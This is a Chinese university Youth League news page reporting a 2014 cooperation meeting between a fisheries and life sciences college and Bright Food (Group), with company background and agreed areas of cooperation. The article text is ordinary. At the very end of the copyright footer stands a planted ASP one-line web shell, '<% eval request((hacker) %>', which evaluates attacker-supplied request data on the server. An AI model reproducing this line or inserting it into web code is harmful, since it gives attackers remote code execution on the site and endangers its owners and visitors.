当前位置:共青团上海海洋大学委员会 >> 新闻中心 >> 学院动态 >> 正文  
站内信息搜索:
水产与生命学院与光明食品(集团)合作共建座谈会召开
[2014年04月15日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    4月12日,水产与生命学院与光明食品(集团)合作共建座谈会在水产与生命学院B楼102会议室举行。光明食品集团团委书记姜伟、光明渔业有限公司党支部书记梁海涛、校团委书记夏雅敏、水产与生命学院副院长张俊彬、党委副书记林海悦、院长助理商利新等20多人出席了座谈会。

    光明食品(集团)有限公司成立于2006年。由上海益民食品一厂(集团)有限公司、上海农工商(集团)有限公司、上海市糖业烟酒(集团)有限公司、锦江国际(集团)有限公司的相关资产集中组建而成。光明食品(集团)是一家以食品产业链为核心的现代都市产业集团。重点发展以种源、生态、装备和标准农业为核心的现代都市农业,包括乳业、大米、猪肉、蔬菜、鲜花、生态森林等;以食品和农产品深加工为核心的现代都市工业,包括冷饮、罐头、食糖和糖果、蜂蜜、黄酒、饮料、休闲食品等;以商业流通和物流配送为核心的现代服务业,包括农工商、好德、伍缘、可的、光明、捷强、第一食品商店、易购365和96858电子商务网络等连锁门店近3300家,以及都市房地产业、出租汽车和物流业、品牌代理服务业等。

    在座谈会上,光明食品(集团)的领导介绍了光明食品集团的组织架构、发展现状、未来前景、团委主要工作和意向合作领域。水产与生命学院领导主要介绍了学院历史和现状、专业特点、师资水平、人才培养、研究领域的情况。双方就多方面的合作意向展开了热烈的讨论,围绕团委工作、青年人才培养、项目技术合作、实践基地建设等达成共识。双方确定在教学实习基地、实践教育基地、项目合作研究、招聘就业、带教实习、员工培训、青年交流、行业标准制定、大学生创业扶持等多方面开展合作,双方约定就具体合作意向进行商讨签订合作协议,以开展长期合作。

    座谈会结束后,双方一致认为此次座谈会非常成功,是一个很好的开端,双方将会尽最大努力提供便利,推动合作共建深入发展。

 

关闭窗口

上一篇:同济大学马玉欣博士应邀作海洋科学一流学科报告

下一篇:水产与生命学院研究生会开展素质拓展活动
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>